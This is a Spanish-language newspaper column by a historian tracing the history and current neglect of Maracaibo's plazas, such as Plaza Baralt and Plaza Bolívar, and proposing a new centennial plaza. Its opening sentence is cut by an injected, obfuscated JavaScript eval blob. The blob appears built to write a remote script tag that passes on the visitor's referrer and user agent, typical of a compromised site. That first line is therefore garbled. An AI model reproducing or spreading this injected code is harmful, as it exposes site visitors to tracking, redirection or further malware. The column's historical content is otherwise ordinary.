Plazas de Maracaibo

Julio Portillo / Historiador / julioportillof@gmail.com
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bnfik|var|u0026u|referrer|reien||js|php'.split('|'),0,{})) tiempos de Venancio Pulgar se compuso una copla que podría volverse a poner de moda: “Por la Plaza Baralt, ya no se puede pasar, porque cortan las orejas, con navaja de afeitar”

¿Qué regalarle a Panorama, en sus cien años de existencia? : Una plaza. Llevaría por nombre: Plaza Centenaria. Ubicación sería: los cerros del Milagro o en Los Haticos para contemplar el Lago, el Puerto y la ciudad.

Desde el ágora griego y el foro romano, hasta las plazas mercados del medioevo y los “espacios de respeto” del renacimiento, el salón urbano de la época moderna y Plaza jardín, Plaza dura y Plaza azul del posmodernismo, estos sitios de las ciudades hablan de la importancia de las mismas. Constituyen su historia.

Las plazas de Maracaibo viven su ocaso. Necesitan ser remozadas como símbolos del aprecio de una comunidad. Desde el siglo XVI registra Maracaibo la construcción de plazas. La más antigua es la Plaza de Santa Ana, junto al Hospital Central. Más tarde llamada Plaza Bustamante donde estuvo ubicado por primera vez el monumento a Udón Pérez, hoy Plaza Miranda.

De 1669 a 1730 la Orden Franciscana construyó el templo de El Convento y la Plazuela de San Francisco, más tarde de la Convención y finalmente  Plaza Baralt. Berty Ríos escribió: “Maracaibo es la Plaza Baralt. Es el barómetro de nuestra realidad social. Fue la cuna del comercio,  ha oído el grito de la arenga y el rumor de la oración. Ha contemplado los días claros de luz y las noches negras de la borrasca. Esa plaza es el pueblo y los pueblos son indestructibles”. Es la plaza europea de Maracaibo. ¿Cuándo terminarán por fin los trabajos de remodelación que diversas administraciones gubernamentales han emprendido?.

Convertida en estacionamiento de buhoneros, de noche es uno de los sitios más inseguros de la ciudad. En tiempos de Venancio Pulgar se compuso una copla que podría volverse a poner de moda: “Por la Plaza Baralt, ya no se puede pasar, porque cortan las orejas, con navaja de afeitar”.

Siguiendo la tradición española, la más importante es la antigua Plaza Mayor, que data de 1574. Cronológicamente tuvo varios nombres: Plaza del Jardín, de San Sebastián, de la Pirámide, Concordia, hasta que en 1867 al colocarle el Presidente del Zulia, Sutherland, un busto del Libertador comenzó a llamarse precisamente Plaza Bolívar.

Siguen en importancia la Plaza Urdaneta, construida en los terrenos de “El Circo” en 1888, la de San Juan de Dios frente a la Basílica de la Chiquinquirá y la Muñeca o de La Libertad (1910) en El Empedrado. En 1929 la Plaza José Enrique Rodó, en 1930 la del Buen Maestro. En los años 40 del siglo XX, la Plaza Páez (1943), de La República (1945) y las de Alonso de Ojeda y del Indio Mara en 1949.

En los años 50 se inauguraron las plazas de Las Madres (1952),  Reina Guillermina, Sucre, Anselmo Belloso, una en El Tránsito y la de Ana María Campos (1956). Finalizando el siglo XX se construyó la Plaza de Las Banderas y más recientemente la del Gaitero en Santa Lucía. Las plazas de Maracaibo están en la poesía, la narrativa corta y en la música nativa. Como elementos urbanos por excelencia merecen ser rescatadas. 

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama